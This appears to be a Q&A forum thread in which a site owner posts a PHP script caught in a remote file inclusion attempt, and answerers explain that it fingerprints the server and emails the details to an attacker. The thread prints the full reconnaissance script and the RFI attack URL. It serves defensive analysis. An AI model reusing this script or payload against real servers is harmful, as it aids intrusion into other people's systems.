views:

244

answers:

3

hey, someone outthere is trying to flood my website with some script. luckly my application caught it

i just wanna know what this code is doing

<script>
<!--
document.write(unescape("<?php
//=================================
//
// scan inb0x hotmail v3.0
//
// coded by FilhOte_Ccs and LOST
// re-c0d3d by delet
//
//
//=================================
//
ini_set("max_execution_time",-1);
set_time_limit(0);
$user = @get_current_user();
$UNAME = @php_uname();
$SafeMode = @ini_get('safe_mode');
 if ($SafeMode == '') { $SafeMode = "OFF"; }
 else { $SafeMode = " $SafeMode "; }
$delet=($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
$dados=("<b>Produto</b> = " . $UNAME . "
<i>Seguran?a</i> = " . $SafeMode . "
http://" . $delet . " 

Muito obrigado por comprar o hehe1 com: <u>delet</u>");
$email = "[email protected]";
$assunto = "lup@";
$email1 = "[email protected]";
$headers = "From: <$email>\r\n";
$headers = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
if(mail($email1,$assunto,$dados,$headers)){
echo "Isso, ja foi!";
exit();
}
else{
echo "N?o foi.";
exit();
}
?>
"));
//-->
</script>

he was trying to do something like this: mysite/index.php?dll=http://www.forms.dgpj.mj.pt/box2.txt?

thanks

A: 

Looks like this script only gathering and sending some info to [email protected] address:

  • Name of the user who executes php scripts on the server
  • Name of operation system, which is installed on the server
  • Is php safe mode enabled
  • Also its url and script name

I think this script is only used for finding servers which can be used for attack.

Ivan Nevostruev
It fails to harvest the user. It's a fail there :)
pst
"Nothing dangerous?" Surely if an outside party can execute any arbitrary code on your server, *that* is dangerous.
Greg Hewgill
Ok, you're right
Ivan Nevostruev
A: 

EDIT: As Greg Hewgill pointed out in a comment, the fact that this has the potential to run, even if there is nothing useful to report, is a concern that shouldn't be taken lightly.

It looks like it's trying to harvest "$SafeMode" stats, for possible exploit use in the future:

...
$dados=("<b>Produto</b> = " . $UNAME . " // server/OS info
<i>Seguran?a</i> = " . $SafeMode . "     // is PHP safe mode off? on? what?
http://" . $delet . "                    // full request URI
...
$email = "[email protected]";      // who is harvesting
...
if(mail($email1,$assunto,$dados,$headers)){ // harvest via. mail

Dolt fails to mail back the user he looked up. Weak sauce.

pst
+3  A: 

http://evilcodecave.blogspot.com/2009/08/rfi-malware-analysis-ascrimez-kit.html

This is a notification script, that is used ... to send notification mails to attackers, to find more vulnerable servers :)

inked